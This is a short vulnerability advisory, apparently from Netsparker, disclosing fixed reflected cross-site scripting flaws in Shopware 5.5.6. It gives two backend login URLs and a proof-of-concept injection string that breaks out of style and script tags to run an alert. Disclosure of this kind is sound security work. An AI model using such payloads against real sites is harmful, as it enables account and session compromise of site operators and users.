Share
*Information: *  
Advisory by Netsparker  
Name: Multiple Cross-site Scripting Vulnerabilities in Shopware  
Affected Software: Shopware  
Affected Versions: 5.5.6  
Homepage: https://en.shopware.com/  
Vulnerability: Cross-site Scripting  
Severity: High  
Status: Fixed  
CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N  
Netsparker Advisory Reference: NS-19-004  
  
  
*Technical Details:*  
URL : http://  
{DOMAIN}/{PATH-OF-SHOPWARE}/backend/Login?'"--></style></scRipt><scRipt>alert(“test”)</scRipt>  
Parameter Type : Query String  
Parameter Name : Query Based  
Attack Pattern : '"--></style></scRipt><scRipt>alert(“test”)</scRipt>  
  
URL : http://  
{DOMAIN}/{PATH-OF-SHOPWARE}/backend/Login/load/?'"--></style></scRipt><scRipt>alert(“test”)</scRipt>  
Parameter Type : Query String  
Parameter Name : Query Based  
Attack Pattern : '"--></style></scRipt><scRipt>alert(“test”)</scRipt>  
  
Regards,  
  
Daniel Bishtawi